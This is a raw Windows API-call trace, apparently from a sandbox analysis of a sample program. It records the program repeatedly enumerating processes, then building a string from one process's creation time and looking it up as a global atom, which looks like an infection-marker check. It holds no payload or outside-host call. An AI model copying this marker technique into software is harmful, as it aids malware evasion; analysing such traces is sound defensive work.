	[0104.973] CloseHandle (hObject=0x694) returned 1
	[0104.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.973] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.973] CloseHandle (hObject=0x694) returned 1
	[0104.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.973] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.973] CloseHandle (hObject=0x694) returned 1
	[0104.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.973] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.974] CloseHandle (hObject=0x694) returned 1
	[0104.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.974] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.974] CloseHandle (hObject=0x694) returned 1
	[0104.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.974] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.974] CloseHandle (hObject=0x694) returned 1
	[0104.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.974] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.974] CloseHandle (hObject=0x694) returned 1
	[0104.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.974] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.974] CloseHandle (hObject=0x694) returned 1
	[0104.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.975] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.975] CloseHandle (hObject=0x694) returned 1
	[0104.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.975] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.975] CloseHandle (hObject=0x694) returned 1
	[0104.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.975] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.975] CloseHandle (hObject=0x694) returned 1
	[0104.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.975] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.975] CloseHandle (hObject=0x694) returned 1
	[0104.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.975] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.975] CloseHandle (hObject=0x694) returned 1
	[0104.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.976] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.976] CloseHandle (hObject=0x694) returned 1
	[0104.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.976] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.976] CloseHandle (hObject=0x694) returned 1
	[0104.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.976] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.976] CloseHandle (hObject=0x694) returned 1
	[0104.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.976] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.976] CloseHandle (hObject=0x694) returned 1
	[0104.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.976] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.976] CloseHandle (hObject=0x694) returned 1
	[0104.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.977] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.977] CloseHandle (hObject=0x694) returned 1
	[0104.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.977] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.977] CloseHandle (hObject=0x694) returned 1
	[0104.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.977] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.977] CloseHandle (hObject=0x694) returned 1
	[0104.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.977] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.977] CloseHandle (hObject=0x694) returned 1
	[0104.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.977] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.977] CloseHandle (hObject=0x694) returned 1
	[0104.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.978] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.978] CloseHandle (hObject=0x694) returned 1
	[0104.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.978] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.978] CloseHandle (hObject=0x694) returned 1
	[0104.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.978] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.978] CloseHandle (hObject=0x694) returned 1
	[0104.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.979] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.979] CloseHandle (hObject=0x694) returned 1
	[0104.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.979] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.979] CloseHandle (hObject=0x694) returned 1
	[0104.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.979] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.979] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.980] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.980] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.980] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.980] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.980] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.981] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.981] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.981] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.981] CloseHandle (hObject=0x694) returned 1
	[0104.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.981] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.981] CloseHandle (hObject=0x694) returned 1
	[0104.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.981] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.981] CloseHandle (hObject=0x694) returned 1
	[0104.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.981] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.982] CloseHandle (hObject=0x694) returned 1
	[0105.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.018] CloseHandle (hObject=0x694) returned 1
	[0105.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.018] CloseHandle (hObject=0x694) returned 1
	[0105.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.018] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.018] CloseHandle (hObject=0x694) returned 1
	[0105.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.019] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.019] CloseHandle (hObject=0x694) returned 1
	[0105.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.019] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.019] CloseHandle (hObject=0x694) returned 1
	[0105.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.019] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.019] CloseHandle (hObject=0x694) returned 1
	[0105.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.019] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.019] CloseHandle (hObject=0x694) returned 1
	[0105.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.020] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.020] CloseHandle (hObject=0x694) returned 1
	[0105.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.020] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.020] CloseHandle (hObject=0x694) returned 1
	[0105.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.021] CloseHandle (hObject=0x694) returned 1
	[0105.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.021] CloseHandle (hObject=0x694) returned 1
	[0105.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.021] CloseHandle (hObject=0x694) returned 1
	[0105.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.021] CloseHandle (hObject=0x694) returned 1
	[0105.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.021] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.021] CloseHandle (hObject=0x694) returned 1
	[0105.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.022] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.022] CloseHandle (hObject=0x694) returned 1
	[0105.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.022] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.022] CloseHandle (hObject=0x694) returned 1
	[0105.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.022] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.022] CloseHandle (hObject=0x694) returned 1
	[0105.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.022] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.022] CloseHandle (hObject=0x694) returned 1
	[0105.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.022] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.022] CloseHandle (hObject=0x694) returned 1
	[0105.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.023] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.023] CloseHandle (hObject=0x694) returned 1
	[0105.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.023] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.023] CloseHandle (hObject=0x694) returned 1
	[0105.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.023] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.023] CloseHandle (hObject=0x694) returned 1
	[0105.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.023] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.023] CloseHandle (hObject=0x694) returned 1
	[0105.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.023] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.024] CloseHandle (hObject=0x694) returned 1
	[0105.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.024] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.024] CloseHandle (hObject=0x694) returned 1
	[0105.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.024] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.024] CloseHandle (hObject=0x694) returned 1
	[0105.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.024] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.024] CloseHandle (hObject=0x694) returned 1
	[0105.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.024] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.024] CloseHandle (hObject=0x694) returned 1
	[0105.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.024] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.025] CloseHandle (hObject=0x694) returned 1
	[0105.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.025] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.025] CloseHandle (hObject=0x694) returned 1
	[0105.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.025] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.025] CloseHandle (hObject=0x694) returned 1
	[0105.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.025] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.026] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.026] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.026] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.026] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.026] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.026] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.027] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.027] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.027] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.027] CloseHandle (hObject=0x694) returned 1
	[0105.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.027] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.027] CloseHandle (hObject=0x694) returned 1
	[0105.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.027] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.027] CloseHandle (hObject=0x694) returned 1
	[0105.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.027] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.028] CloseHandle (hObject=0x694) returned 1
	[0105.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.063] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.063] CloseHandle (hObject=0x694) returned 1
	[0105.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.064] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.064] CloseHandle (hObject=0x694) returned 1
	[0105.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.065] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.065] CloseHandle (hObject=0x694) returned 1
	[0105.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.065] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.065] CloseHandle (hObject=0x694) returned 1
	[0105.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.065] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.065] CloseHandle (hObject=0x694) returned 1
	[0105.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.065] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.065] CloseHandle (hObject=0x694) returned 1
	[0105.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.065] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.065] CloseHandle (hObject=0x694) returned 1
	[0105.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.066] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.066] CloseHandle (hObject=0x694) returned 1
	[0105.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.066] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.066] CloseHandle (hObject=0x694) returned 1
	[0105.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.066] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.066] CloseHandle (hObject=0x694) returned 1
	[0105.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.066] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
